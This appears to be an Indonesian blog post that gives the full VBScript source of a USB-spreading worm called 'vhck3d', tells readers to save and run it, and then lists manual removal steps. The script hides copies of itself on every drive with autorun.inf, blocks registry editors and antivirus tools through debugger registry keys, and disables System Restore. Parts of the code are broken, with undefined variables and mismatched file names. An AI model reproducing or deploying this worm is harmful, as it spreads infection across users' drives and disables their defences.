------------------------script begin--------------------------
On error resume next
Dim dik,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
Set = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dik = dik & text.readline
Dik = dik & vbcrlf
Loop
Do
'Buat file prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dik
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Sip Sekarang save dengan Format Vbs..Trus hasilnya double klick ...dan ikuti cara seterusnya dibawah ini...
SEKARANG ANDA BASMI VIRUS TERSEBUT....
Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.
Cara pembasmiannya :
1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer
2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada
3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.
TERIMAKASIH BAGI YANG SUDAH MEMBACA DAN MEMPRATIKANNYA...
Tidak ada komentar:
Posting Komentar